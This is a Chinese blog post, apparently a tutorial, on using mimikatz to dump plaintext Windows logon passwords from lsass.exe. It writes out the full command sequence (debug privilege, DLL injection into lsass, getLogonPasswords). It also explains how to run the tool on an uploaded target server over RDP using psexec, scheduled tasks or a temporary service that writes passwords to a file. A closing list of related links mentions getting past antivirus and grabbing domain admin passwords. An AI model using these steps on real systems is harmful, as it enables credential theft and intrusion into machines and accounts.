介绍一下神器mimikatz,从lsass里抓密码
昨天弄了下OphCrack,一个破解windows密码的玩意,顺带想起了这个神器,mimikatz,本人首创中文译名为:咪咪卡住,不要笑,这是很严肃的名字。
咪咪卡住的下载地址:
http://blog.gentilkiwi.com/mimikatz
mimikat是一个法国人写的轻量级调试器,因为牛逼,所以成了神器。神器之所以出名了,是因为神器可以直接从 lsass.exe 里获取windows处于active状态账号明文密码,是很强大的。下面看看从我的Win7 64位上面抓密码。
进入咪咪卡住的目录,运行:
1
|
//开始运行神器
|
2
|
mimikatz
|
3
|
//提升权限
|
4
|
privilege::debug
|
5
|
//注入dll
|
6
|
inject::process lsass.exe sekurlsa.dll
|
7
|
//抓取密码
|
8
|
@getLogonPasswords
|
不管密码多么复杂都能抓出来
作者的回答的原因是,在llsass中,明文密码经过加密算法的密文 (这个加密算法是可逆的 能被解密出明文)
这个咪咪卡住啦,支持
1
|
Windows XP (部分可以)
|
2
|
Windows Server 2003
|
3
|
Windows Server 2008
|
4
|
Windows Vista
|
5
|
Windows 7
|
6
|
Windows 7 SP1
|
在远程终端(3389、mstsc.exe)、虚拟桌面中抓取密码的方法:
通常你在远程终端中运行该程序会提示:存储空间不足,无法处理此命令。
这是因为在终端模式下,不能插入远线程,跨会话不能注入,你需要使用如下方法执行该程序:
首先提取几个文件,只抓取密码的话,只需要这几个文件:
1
|
mimikatz_trunk\tools\PsExec.exe
|
2
|
mimikatz_trunk\Win32\mimikatz.exe
|
3
|
mimikatz_trunk\Win32\sekurlsa.dll
|
打包后上传至目标服务器,然后解压释放,注意路径中绝对不能有中文(可以有空格)!否则加载DLL的时候会报错:找不到文件。
然后使用以下任何一种方法即可抓取密码:
1
|
//最简单实用的方法,使用 PsExec.exe 启动。
|
2
|
//在系统帐户中运行 cmd.exe,或者直接运行 mimikatz.exe
|
3
|
psexec -s cmd.exe
|
4
|
//启动 mimikatz.exe
|
5
|
C:\mimikatz_trunk\Win32\mimikatz.exe
|
6
|
//提升权限
|
7
|
privilege::debug
|
8
|
//注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!
|
9
|
inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
|
10
|
//抓取密码
|
11
|
@getLogonPasswords
|
12
|
//退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。
|
13
|
exit
|
14
|
15
|
//*********************************************************
|
16
|
17
|
//使用 At 启动
|
18
|
at ***
|
19
|
20
|
//*********************************************************
|
21
|
22
|
//创建服务方法
|
23
|
sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt"
|
24
|
sc start getpassword
|
25
|
sc delete getpassword
|
26
|
27
|
//*********************************************************
|
28
|
29
|
//telnet 远程命令管道
|
30
|
telnet ****
|
介绍一下神器mimikatz,从lsass里抓密码相关推荐
- 服务器读取账号密码,WIN服务器得明文密码神器 mimikatz、WCE
一.mimikatz(自己亲试,可以在win7 x64下使用) 昨天有朋友发了个法国佬写的神器叫mimikatz 让我们看下 还有一篇用这个神器直接从 lsass.exe 里获取windows处于ac ...
- ProcDump+Mimikatz绕过杀毒软件抓密码
抓密码的奇淫技巧 背景 1.原理 2.实操演示 背景 如果主机上装了杀毒软件,开了防火墙,例如:360.火绒之类的话.Mimikatz就会被检测为病毒,无法使用,而想要对Mimikatz进行二次开发或 ...
- 用mimikatz来获取win7的密码
mimikatz下载地址: http://www.webshell.cc/wp-content/uploads/2012/02/mimikatz_trunk.zip http://blog.genti ...
- 内网渗透之mimikatz+procdump 提取 Windows 明文密码
0x00 原理 获取到内存文件 lsass.exe 进程 (它用于本地安全和登陆策略) 中存储的明文登录密码. 0x01 操作 Windows10/2012 以下的版本: 1.上传 procdump ...
- 抓包工具有哪些你知道吗?今天给你们介绍四款最受欢迎的抓包神器
抓包常用工具: fiddler:windows平台最受欢迎抓包工具.免费.易用 charles:Mac平台下最佳抓包工具,易于使用,收费软件,可以一直使用 wireShark:老牌抓包工具,跨平台,功 ...
- mimikatz实战域渗透抓取域控管理员密码
实验环境: 攻击机:Kali 靶 机:Windows server 2012 工具:mimikatz2.1 这里实验所需要的工具我会上传到我的资源里面,有需要的小伙伴可以自己去下载 条件:靶机获取到s ...
- 简单介绍使用Nginx限制百度蜘蛛频繁抓取的问题
这篇文章主要介绍了使用Nginx限制百度蜘蛛频繁抓取的问题,百度蜘蛛对网站的抓取频率高和抓取量骤增导致服务器负载高,经常收到警告信息,每分钟允许百度蜘蛛抓取200次,超过频率限制的返回503,对Ngi ...
- SSH介绍与神器Tabby
文章目录 一.什么是SSH 二.SSH的原理 三.SSH的安全性 中间人攻击 解决 四.SSH的使用 Linux Windows SSH工具的总结 五.Tabby 1. 根据自己的系统下载相应的Tab ...
- 【疫情神器】用python里的itchat,写了一个监控微信群成员打卡的小程序
疫情期间,微信群里各种打卡统计信息啊有没有.作为高贵的 程序猿,我们怎么不用代码自己统计呢?我拍头一想,这玩意儿肯定会有脚本支持的,一百度,看到了一个神器:itchat~ itchat真的是一个很神奇 ...
最新文章
- 嵌入式Web服务器移植
- 修图动口不动手,有人把StyleGAN和CLIP组了个CP,能听懂修图指令那种
- 第三天·HTML常用标签
- 列表解析和生成器表达式
- SAP CRM service contract和individual object
- lua# lua5.1.4 源码文件作用一览
- mysql索引原理剖析
- 单价数量和总价的公式_人教版四年级数学上册单价、数量和总价之间的关系微课...
- Windows11 Docker镜像存储路径更改(非C盘路径)
- 从一盏路灯,看亿万级联接的智能之路
- IE6 Hack(转载)
- 如何从另一个Shell脚本调用Shell脚本?
- Mysql存储过程中使用cursor
- 【好玩的代码雨(附源代码)】
- ICH E2B | ICSR 电子传输网关对接解决方案
- SHOPEX网店系统测试,50万家网站的安全令人担忧
- linux mtd0信息,linux mtd
- 多屏互动之Windows与Mac下的非自带的远程桌面应用
- vs2017 15.5.x dll调试不成功问题
- 前台通过base64传图片到后台的实现方法
热门文章
- 黑客入侵“在线影院”全过程1
- 图形计算器(geogebra[5.0.278.0])使用QQ浏览器打开下载
- 解决Firefox搜索栏不能切换新标签页的问题
- 【综述】NLP 对抗训练(FGM、PGD、FreeAT、YOPO、FreeLB、SMART)
- 这7项技能,是成为一名厉害的自动化测试员所必备的
- 怎样把多张图片快速合成GIF?如何在线合成gif动图?
- STM32利用flash读取音频数据读取与DAC播放
- Canon LBP3500在ubuntu上面的安装(2)
- 4、Cas Server的配置文件
- stm32CubeMX的安装和点亮流水灯